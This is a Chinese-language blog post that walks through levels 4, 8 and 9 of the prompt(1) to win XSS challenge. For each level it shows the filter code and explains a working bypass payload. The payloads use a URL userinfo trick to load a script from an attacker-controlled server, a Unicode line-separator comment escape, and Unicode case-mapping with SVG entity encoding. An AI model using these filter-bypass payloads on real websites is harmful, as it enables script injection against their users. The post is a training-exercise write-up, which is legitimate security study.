<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"ctzsb.top","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="prompt(1) to win  出自prompt(1)小挑战记录有意思的题目">
<meta property="og:type" content="article">
<meta property="og:title" content="prompt(1) to win">
<meta property="og:url" content="http://ctzsb.top/2023/09/25/prompt-1-to-win/index.html">
<meta property="og:site_name" content="Ctz">
<meta property="og:description" content="prompt(1) to win  出自prompt(1)小挑战记录有意思的题目">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://ctzblog-1315220971.cos.ap-guangzhou.myqcloud.com/images/202309252049569.png">
<meta property="og:image" content="https://ctzblog-1315220971.cos.ap-guangzhou.myqcloud.com/images/202309252045135.png">
<meta property="og:image" content="https://ctzblog-1315220971.cos.ap-guangzhou.myqcloud.com/images/202309252049606.png">
<meta property="og:image" content="https://ctzblog-1315220971.cos.ap-guangzhou.myqcloud.com/images/202309252310220.png">
<meta property="og:image" content="https://ctzblog-1315220971.cos.ap-guangzhou.myqcloud.com/images/202309261135067.png">
<meta property="article:published_time" content="2023-09-25T12:46:12.000Z">
<meta property="article:modified_time" content="2023-09-26T03:40:25.651Z">
<meta property="article:author" content="SB">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://ctzblog-1315220971.cos.ap-guangzhou.myqcloud.com/images/202309252049569.png">

<link rel="canonical" href="http://ctzsb.top/2023/09/25/prompt-1-to-win/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>prompt(1) to win | Ctz</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Ctz</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://ctzsb.top/2023/09/25/prompt-1-to-win/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="SB">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Ctz">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          prompt(1) to win
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2023-09-25 20:46:12" itemprop="dateCreated datePublished" datetime="2023-09-25T20:46:12+08:00">2023-09-25</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2023-09-26 11:40:25" itemprop="dateModified" datetime="2023-09-26T11:40:25+08:00">2023-09-26</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>prompt(1) to win </p>
<p>出自prompt(1)小挑战记录有意思的题目</p>
<span id="more"></span>

<h2 id="level-4"><a href="#level-4" class="headerlink" title="level-4"></a>level-4</h2><p>只允许如下站点的脚本 <a target="_blank" rel="noopener" href="http://prompt.ml/js/test.js">http://prompt.ml/js/test.js</a></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// make sure the script belongs to own site</span></span><br><span class="line">    <span class="comment">// sample script: http://prompt.ml/js/test.js</span></span><br><span class="line">    <span class="keyword">if</span> (/^(?:https?:)?\/\/prompt\.ml\<span class="comment">//i.test(decodeURIComponent(input))) &#123;</span></span><br><span class="line">        <span class="keyword">var</span> script = document.<span class="title function_ invoke__">createElement</span>(<span class="string">&#x27;script&#x27;</span>);</span><br><span class="line">        script.src = input;</span><br><span class="line">        <span class="keyword">return</span> script.outerHTML;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&#x27;Invalid resource.&#x27;</span>;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>



<p>题目分析：这里通过限制src的值的开头必须为<a target="_blank" rel="noopener" href="http://prompt.ml/%EF%BC%8C%E6%9D%A5%E8%BE%BE%E5%88%B0src%E7%9A%84%E5%80%BC%E5%BF%85%E9%A1%BB%E4%B8%BA%E5%90%8C%E6%BA%90%E7%9A%84%E8%84%9A%E6%9C%AC%E7%9A%84%E7%9B%AE%E7%9A%84%EF%BC%8C%E6%9F%A5%E6%89%BE%E8%B5%84%E6%96%99%E5%8F%91%E7%8E%B0%E5%8F%AF%E4%BB%A5%E5%88%A9%E7%94%A8url%E7%9A%84%E7%89%B9%E6%80%A7%E7%BB%95%E8%BF%87">http://prompt.ml/，来达到src的值必须为同源的脚本的目的，查找资料发现可以利用url的特性绕过</a>.</p>
<p>浏览器支持这样的url：user:<a href="mailto:&#x70;&#x61;&#115;&#x73;&#119;&#x6f;&#114;&#x64;&#64;&#97;&#x74;&#116;&#x61;&#99;&#107;&#101;&#114;&#x2e;&#x63;&#111;&#109;">&#x70;&#x61;&#115;&#x73;&#119;&#x6f;&#114;&#x64;&#64;&#97;&#x74;&#116;&#x61;&#99;&#107;&#101;&#114;&#x2e;&#x63;&#111;&#109;</a>。意思是使用user:password登录到站点attacker.com.</p>
<p>举例如下：admin:<a href="mailto:&#x31;&#50;&#51;&#52;&#53;&#x36;&#x40;&#119;&#119;&#119;&#x2e;&#98;&#97;&#105;&#100;&#x75;&#x2e;&#x63;&#111;&#x6d;">&#x31;&#50;&#51;&#52;&#53;&#x36;&#x40;&#119;&#119;&#119;&#x2e;&#98;&#97;&#105;&#100;&#x75;&#x2e;&#x63;&#111;&#x6d;</a>，意即使用用户名admin和密码123456登录到百度站点。</p>
<p>当然这个url也可以简化为<a href="mailto:&#117;&#x73;&#x65;&#114;&#64;&#x61;&#116;&#x74;&#97;&#99;&#107;&#101;&#114;&#x2e;&#x63;&#111;&#109;">&#117;&#x73;&#x65;&#114;&#64;&#x61;&#116;&#x74;&#97;&#99;&#107;&#101;&#114;&#x2e;&#x63;&#111;&#109;</a>，即省略密码。</p>
<p>因此我们在构造<a target="_blank" rel="noopener" href="http://prompt.ml/@attacker.com%E7%B1%BB%E4%BC%BC%E7%9A%84Payload%EF%BC%8C%E5%B0%86http://prompt.ml/%E4%BD%9C%E4%B8%BAuser%EF%BC%8Cattack.com%E7%90%86%E6%89%80%E5%BA%94%E5%BD%93%E5%B0%B1%E6%98%AF%E6%88%91%E4%BB%AC%E8%87%AA%E5%B7%B1%E7%9A%84%E6%9C%8D%E5%8A%A1%E5%99%A8%EF%BC%8C%E8%BF%99%E6%A0%B7%E5%B0%B1%E7%BB%95%E8%BF%87%E4%BA%86%E5%90%8C%E6%BA%90%E9%99%90%E5%88%B6%E3%80%82">http://prompt.ml/@attacker.com类似的Payload，将http://prompt.ml/作为user，attack.com理所应当就是我们自己的服务器，这样就绕过了同源限制。</a></p>
<p>但是这个payload还不行，因为 &#x2F; 出现在user中是不允许的。考虑到这里的正则特性和decodeURIComponent函数，所以可以使用%2f绕过。</p>
<p>在这里我选择使用 Python3在本地启动简易 Http 服务器<br>启动服务<br>在需要监听的文件夹打开命令行，输入命令：</p>
<p>python -m http.server 8888</p>
<p>即可在 8888 端口启动 Http 服务（Ctrl+C 中断服务）。</p>
<p>根目录下创建xss.js</p>
<p>内容为<code>prompt(1)</code></p>
<p><img src="https://ctzblog-1315220971.cos.ap-guangzhou.myqcloud.com/images/202309252049569.png" alt="image-20230925204750406"></p>
<img src="https://ctzblog-1315220971.cos.ap-guangzhou.myqcloud.com/images/202309252045135.png"/>

<p><img src="https://ctzblog-1315220971.cos.ap-guangzhou.myqcloud.com/images/202309252049606.png" alt="image-20230925204725264"></p>
<h2 id="level-8"><a href="#level-8" class="headerlink" title="level-8"></a>level-8</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">input</span>) </span>&#123;</span><br><span class="line">    <span class="comment">// prevent input from getting out of comment</span></span><br><span class="line">    <span class="comment">// strip off line-breaks and stuff</span></span><br><span class="line">    input = input.<span class="title function_ invoke__">replace</span>(/[\r\n&lt;/<span class="string">&quot;]/g, &#x27;&#x27;);</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    return &#x27;                                \n\</span></span><br><span class="line"><span class="string">&lt;script&gt;                                    \n\</span></span><br><span class="line"><span class="string">    // console.log(&quot;</span><span class="string">&#x27; + input + &#x27;</span><span class="string">&quot;);        \n\</span></span><br><span class="line"><span class="string">&lt;/script&gt; &#x27;;</span></span><br><span class="line"><span class="string">&#125;    </span></span><br></pre></td></tr></table></figure>

<p>这题一开始就把我们输入的内容都放到 <code>&lt;script&gt;</code> 标签里面了，换言之我们可以直接注入 JS 代码。</p>
<p>但实际上所输入的内容都在 行注释 <code>//</code> 后面，即使注入了 JS 也被注释掉，无法执行</p>
<p>题目把 回车换行符 <code>\r\n</code> 都过滤掉了，无法直接换行：</p>
<p>虽然 <strong>ASCII</strong> 字符的换行符被过滤了，但是在 JS 里面是可以直接使用 Unicode 字符的，即可以使用 <strong>Unicode</strong> 的换行符进行绕过。查一下 Unicode 空字符的编码表，其中换行符的编码是 <code>\u000A</code> 和 <code>\u2028</code>。</p>
<p>但是 <code>\u000A</code> 等价于 ASCII 的 <code>\n</code> ，前面知道它被过滤了无法使用，所以可以使用 <code>\u2028</code> 作为替代。</p>
<p>这里先假设我们已经成功使用 <code>\u2028</code> 字符进行换行，跳出了 <code>//</code> 行注释。</p>
<p>那么我们预期用于完成挑战的 JS 代码应该是这样的：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span></span><br><span class="line">    // console.log(&quot;</span><br><span class="line">prompt(1)&quot;);</span><br><span class="line"><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>但事实上这段代码由于语法错误，<code>prompt(1)</code> 是无法执行的，原因是末尾的 <code>&quot;);</code> 。</p>
<p>即使把 <code>&quot;);</code> 换到另一行，依然是语法错误：</p>
<h3 id="绕过注释过滤"><a href="#绕过注释过滤" class="headerlink" title="绕过注释过滤"></a>绕过注释过滤</h3><p>为了把 <code>&quot;);</code> 处理掉，要么将其闭合，要么将其注释。</p>
<p>但是尖括号 <code>&lt;</code> 、双引号 <code>&quot;</code> 、反斜杠 <code>/</code> 也都被过滤了，所以既没办法提前闭合 <code>&lt;/script&gt;</code>， 也没办法使用另一个函数 <code>fun(&quot;</code> 向后闭合引号，当然多行注释 <code>/*</code> 和行注释 <code>//</code> 也没办法使用了，就更不用说 <code>&lt;!--</code> HTML 注释了（而且在 JS 区域内也没法用）。</p>
<p>这里需要使用到 JS 中的一个注释黑魔法：</p>
<p><strong>在 JS 代码中，当</strong> <code>--&gt;</code> <strong>位于行首时（左侧不能有任何非空字符），那么它相当于行注释</strong>。</p>
<p>因此只需要构造这样的代码，就可以成功注释掉 <code>&quot;);</code> ：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span></span><br><span class="line">    // console.log(&quot;</span><br><span class="line">prompt(1)</span><br><span class="line">--&gt;&quot;);</span><br><span class="line"><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<h3 id="构造-payload"><a href="#构造-payload" class="headerlink" title="构造 payload"></a>构造 payload</h3><p>至此我们可以已经知道 payload 应该为：<code>\u2028prompt(1)\u2028--&gt;</code></p>
<p>但是题目并不会帮我们把 Unicode 编码 <code>\u2028</code> 直接转换为换行符，所以我们需要直接输入这个换行符。</p>
<p>但是使用键盘是无法输入这个换行符的，这里可以在网上搜个unicode编码转换的网站来转换<code>\u2028</code> </p>
<p><img src="https://ctzblog-1315220971.cos.ap-guangzhou.myqcloud.com/images/202309252310220.png" alt="image-20230925231034119"></p>
<p>把这个换行符复制出来就可以了</p>
<p>最终得到真正的 payload 如下（注意这个 payload 已经有 Unicode 换行符了，只是看不见罢了）：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exp-payload: prompt(1) --&gt;</span><br></pre></td></tr></table></figure>

<p>输入这个 payload 即可完成挑战（但是题目输出依然看不见换行效果…）</p>
<p>参考链接： <a target="_blank" rel="noopener" href="https://exp-blog.com/safe/ctf/prompt/level-8-unicode/">https://exp-blog.com/safe/ctf/prompt/level-8-unicode/</a></p>
<h2 id="level-9"><a href="#level-9" class="headerlink" title="level-9"></a>level-9</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">input</span>) </span>&#123;</span><br><span class="line">    <span class="comment">// filter potential start-tags</span></span><br><span class="line">    input = input.<span class="title function_ invoke__">replace</span>(/&lt;([a-zA-Z])/g, <span class="string">&#x27;&lt;_$1&#x27;</span>);</span><br><span class="line">    <span class="comment">// use all-caps for heading</span></span><br><span class="line">    input = input.<span class="title function_ invoke__">toUpperCase</span>();</span><br><span class="line"></span><br><span class="line">    <span class="comment">// sample input: you shall not pass! =&gt; YOU SHALL NOT PASS!</span></span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;&lt;h1&gt;&#x27;</span> + input + <span class="string">&#x27;&lt;/h1&gt;&#x27;</span>;</span><br><span class="line">&#125;   </span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>这题用正则 <code>&lt;([a-zA-Z])</code> 把所有正常标签都过滤成了 <code>&lt;_</code> ，而我们的输入内容都在 <code>&lt;h1&gt;</code> 标签里面，导致常规可以注入 JS 的标签基本都失效。</p>
<p>不过注意到题目会把我们输入的内容使用 <code>toUpperCase</code> 方法全部转换成大写。</p>
<p>一般情况下这个方法只对 ASCII 小写字母起作用，但是根据 <a target="_blank" rel="noopener" href="http://ecma-international.org/ecma-262/5.1/#sec-15.5.4.18">ECAMScript 定义</a>，这个方法对部分 Unicode 字符也会起作用，即它有意把某些 Unicode 字符映射到某些 ASCII 字符（串）。</p>
<p>但是我们不清楚这个具体的映射表是什么，是否可利用。</p>
<p>于是我简单写了这个 JS 代码，拷贝到浏览器的控制台运行，即可把 Unicode 通过 <code>toUpperCase</code> 方法映射到 ASCII 的映射表打印出来（<em>此代码只打印了 XSS 可能会用到的 ASCII 字符，并未把全部字符列印</em>）：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable constant_">UNICODE_RANGE</span> = <span class="number">65000</span>;</span><br><span class="line"><span class="variable constant_">XSS_ASCII_RANGE</span> = <span class="string">&quot;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\&quot;/?&gt;&lt;&#x27;;:.,|\\+=-_*&amp;^%$#@!~`\r\n&quot;</span></span><br><span class="line"><span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; <span class="variable constant_">UNICODE_RANGE</span>; i++) &#123;</span><br><span class="line">    raw_ch = <span class="title class_">String</span>.<span class="title function_">fromCharCode</span>(i)</span><br><span class="line">    low_ch = <span class="string">&quot;&quot;</span>;</span><br><span class="line">    upp_ch = <span class="string">&quot;&quot;</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="variable constant_">XSS_ASCII_RANGE</span>.<span class="title function_">includes</span>(raw_ch.<span class="title function_">toLowerCase</span>())) &#123;</span><br><span class="line">        low_ch = raw_ch.<span class="title function_">toLowerCase</span>();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="variable constant_">XSS_ASCII_RANGE</span>.<span class="title function_">includes</span>(raw_ch.<span class="title function_">toUpperCase</span>())) &#123;</span><br><span class="line">        upp_ch = raw_ch.<span class="title function_">toUpperCase</span>();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> ((low_ch != <span class="string">&quot;&quot;</span> || upp_ch != <span class="string">&quot;&quot;</span>) &amp;&amp; !(<span class="variable constant_">XSS_ASCII_RANGE</span>.<span class="title function_">includes</span>(raw_ch))) &#123;</span><br><span class="line">        <span class="variable language_">console</span>.<span class="title function_">log</span>(</span><br><span class="line">            <span class="string">&quot;Unicode-Idx: [&quot;</span> + i + <span class="string">&quot;], &quot;</span> + </span><br><span class="line">            <span class="string">&quot;Raw-Unicode: [&quot;</span> + raw_ch + <span class="string">&quot;], &quot;</span> + </span><br><span class="line">            <span class="string">&quot;Unicode-Hex: [\\u&quot;</span> + (i).<span class="title function_">toString</span>(<span class="number">16</span>) + <span class="string">&quot;], &quot;</span> + </span><br><span class="line">            <span class="string">&quot;To-LowerCase-ASCII: [&quot;</span> + low_ch + <span class="string">&quot;], &quot;</span> + </span><br><span class="line">            <span class="string">&quot;To-UpperCase-ASCII: [&quot;</span> + upp_ch + <span class="string">&quot;]&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<p>用运行结果来看，有两个字符的映射是明显对我们有用的：</p>
<ul>
<li>Unicode 的 <code>ı</code> 通过 <code>toUpperCase</code> 会被转换成 ASCII 的 <code>I</code></li>
<li>Unicode 的 <code>ſ</code> 通过 <code>toUpperCase</code> 会被转换成 ASCII 的 <code>S</code></li>
</ul>
<blockquote>
<p>可以映射到 <code>ST</code> 的两个字符 <code>ﬅ</code> 或 <code>ﬆ</code> 也是可以利用的，只是相对没那么方便。</p>
</blockquote>
<p>换言之，只要我们输入 <code>&lt;ı</code> 或 <code>&lt;ſ</code> ，即可绕过题目对标签名的正则过滤，而题目的 <code>toUpperCase</code> 方法又会帮我们将他们转换成 <code>&lt;I</code> 或 <code>&lt;S</code> 。</p>
<p>由于 HTML 的标签名和属性名都是大小写不敏感的，因此我们就可以利用这个特点，注入以 <code>I</code> 或 <code>S</code> 开头的标签。</p>
<p>由此首先想到可以的标签就有 3 个 ： <code>&lt;IMG&gt;</code> 、<code>&lt;SCRIPT&gt;</code> 、<code>&lt;SVG&gt;</code></p>
<p>标签弄完之后，还是不行因为还有 <strong>toUpperCase</strong>需要绕过</p>
<p>尝试注入 payload <code>&lt;ımg src=0 onerror=prompt(1) /&gt;</code></p>
<p>虽然成功注入为 <code>&lt;IMG SRC=0 ONERROR=PROMPT(1) /&gt;</code> ，但是在触发 <code>onerror</code> 事件时报错：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Uncaught ReferenceError: PROMPT is not defined</span><br></pre></td></tr></table></figure>

<p>原因是 JS 对函数名是大小写敏感的，而 <code>prompt</code> 也被转换成了大写。</p>
<p>此时我想到可以利用 <code>&lt;svg&gt;</code> <strong>运行时才解析实体编码</strong>的特性，对大写转换进行绕过。</p>
<p>即先把 <code>prompt</code> 编码成 <code>prompt</code> ，这样实体编码在输出到前端之前， <code>toUpperCase</code> 对它就不起作用了。</p>
<p>然后再使用 <code>&lt;svg&gt;</code> 标签包围实体编码，实体编码就能在输出到前端后、在运行时被解析还原成 <code>prompt</code> 。</p>
<p>于是把 payload 修改成这样，完成挑战：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload: <span class="tag">&lt;<span class="name">ſvg</span>&gt;</span><span class="tag">&lt;ſcript&gt;</span><span class="language-handlebars"><span class="language-xml"><span class="symbol">&amp;#112;</span><span class="symbol">&amp;#114;</span><span class="symbol">&amp;#111;</span><span class="symbol">&amp;#109;</span><span class="symbol">&amp;#112;</span><span class="symbol">&amp;#116;</span><span class="symbol">&amp;#40;</span><span class="symbol">&amp;#49;</span><span class="symbol">&amp;#41;</span></span></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span><span class="tag">&lt;/<span class="name">svg</span>&gt;</span></span><br></pre></td></tr></table></figure>



<p><img src="https://ctzblog-1315220971.cos.ap-guangzhou.myqcloud.com/images/202309261135067.png" alt="image-20230926113501963"></p>
<p>参考: <a target="_blank" rel="noopener" href="https://exp-blog.com/safe/ctf/prompt/level-9-ecmascript/">https://exp-blog.com/safe/ctf/prompt/level-9-ecmascript/</a></p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/09/20/%E7%AC%94%E8%AF%95%E9%A2%98%E8%AE%B0%E5%BD%95/" rel="prev" title="笔试题记录">
      <i class="fa fa-chevron-left"></i> 笔试题记录
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/09/26/%E9%9D%A2%E8%AF%95%E9%A2%98%E8%AE%B0%E5%BD%95/" rel="next" title="面试题记录">
      面试题记录 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#level-4"><span class="nav-number">1.</span> <span class="nav-text">level-4</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-8"><span class="nav-number">2.</span> <span class="nav-text">level-8</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E6%B3%A8%E9%87%8A%E8%BF%87%E6%BB%A4"><span class="nav-number">2.1.</span> <span class="nav-text">绕过注释过滤</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9E%84%E9%80%A0-payload"><span class="nav-number">2.2.</span> <span class="nav-text">构造 payload</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-9"><span class="nav-number">3.</span> <span class="nav-text">level-9</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">SB</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">20</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">SB</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
